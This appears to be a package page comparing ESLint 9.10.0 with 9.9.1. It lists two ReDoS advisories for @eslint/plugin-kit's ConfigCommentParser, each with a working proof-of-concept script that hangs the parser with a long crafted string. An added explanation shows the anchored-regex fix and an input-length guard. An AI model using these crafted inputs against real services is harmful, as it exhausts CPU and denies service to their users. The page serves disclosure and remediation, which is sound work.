ESLint version 9.10.0 introduces several updates compared to its predecessor, version 9.9.1, making it a compelling upgrade for JavaScript developers. One key difference lies in the dependencies: version 9.10.0 bumps the @eslint/js dependency to 9.10.0, in line with the main package, whereas 9.9.1 depended on @eslint/js 9.9.1. This suggests improvements and fixes within ESLint's core JavaScript rules. Furthermore, @eslint/core was updated from 0.4.0 to 0.5.0, and @eslint/json from 0.3.0 to 0.4.0. These upgrades likely bring enhancements to ESLint's core functionality and its JSON-specific linting capabilities.
The newer version also reflects a commitment to staying current with supporting libraries, as evidenced by the introduction of @humanwhocodes/module-importer ^1.0.1 and other dependency updates. Developers should note that while many devDependencies remain the same, the introduction of @eslint-community/regexpp ^4.11.0 and @eslint-community/eslint-utils ^4.2.0 in dependencies can affect rulesets that rely on regular expressions, potentially leading to more accurate or stricter linting behavior. Lastly, version 9.10.0 features changes in the distribution, reflected in an increase in fileCount (from 404 to 416) and unpackedSize (from 3,080,094 bytes to 3,288,062 bytes), indicating added features or modifications.
All vulnerabilities related to version 9.10.0 of the package
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
Crafting a very large and well-crafted string can increase CPU usage and crash the program.
const { ConfigCommentParser } = require("@eslint/plugin-kit");
// Build a very long run of whitespace followed by a single non-space character.
var str = "";
for (var i = 0; i < 1000000; i++) {
str += " ";
}
str += "A";
console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end");
// run `npm i @eslint/plugin-kit` and `node attack.js`
// then the program will be stuck forever with high CPU usage
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
// A long run of key characters that is never followed by ":" forces the
// unanchored pattern to retry from every offset.
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end");
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will be stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack that may block execution and cause high CPU usage.
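To make the "not anchored" point concrete, the following is an added example (not code from the page or from @eslint/plugin-kit) that places a key-quoting regex of the shape the advisory describes beside the anchored form it recommends, and wraps the parser in a length guard as defense in depth. The exact pattern at config-comment-parser.js:158, the `MAX_COMMENT_LENGTH` value and the function names are assumptions.

```javascript
// Unanchored: for a long run of key characters with no ":" after it, the
// engine matches the run greedily, fails, backtracks, then retries from the
// next offset, so total work grows with the square of the run length.
// (Reconstructed shape; the real pattern in plugin-kit is an assumption.)
const UNANCHORED_KEY_RE = /([-a-zA-Z0-9/]+)\s*:/gu;

// Anchored as the advisory suggests: a match may only begin at the start of
// the string or right after a character that cannot belong to a key, so each
// run of key characters is scanned once instead of once per offset.
const ANCHORED_KEY_RE = /(^|[^-a-zA-Z0-9/])([-a-zA-Z0-9/]+)\s*:/gu;

function quoteKeysUnanchored(input) {
  return input.replace(UNANCHORED_KEY_RE, '"$1":');
}

function quoteKeysAnchored(input) {
  return input.replace(ANCHORED_KEY_RE, '$1"$2":');
}

// Constructed input in the shape of the PoC above: n key characters that are
// never followed by ":" so every match attempt fails as late as possible.
function redosInput(n) {
  return `${"A".repeat(n)}?: 1 B: 2`;
}

// Wall-clock cost of one call; only the growth between sizes is meaningful.
function timeMs(fn, input) {
  const start = performance.now();
  fn(input);
  return performance.now() - start;
}

// Defense in depth for untrusted comment text: reject oversized input before
// any regex runs. The limit is an assumed value; tune it per project.
const MAX_COMMENT_LENGTH = 10000;

function quoteKeysGuarded(input) {
  if (input.length > MAX_COMMENT_LENGTH) {
    throw new RangeError(`config comment too long (${input.length} chars)`);
  }
  return quoteKeysAnchored(input);
}

// Returns timings for doubling input sizes; the unanchored column roughly
// quadruples per step while the anchored column stays flat.
function growthTable(sizes = [2000, 4000, 8000]) {
  return sizes.map((n) => ({
    n,
    unanchoredMs: timeMs(quoteKeysUnanchored, redosInput(n)),
    anchoredMs: timeMs(quoteKeysAnchored, redosInput(n)),
  }));
}
```

Both forms rewrite benign config comments identically; only their worst-case cost differs, which is why the fix is a regex change rather than a behavioral one.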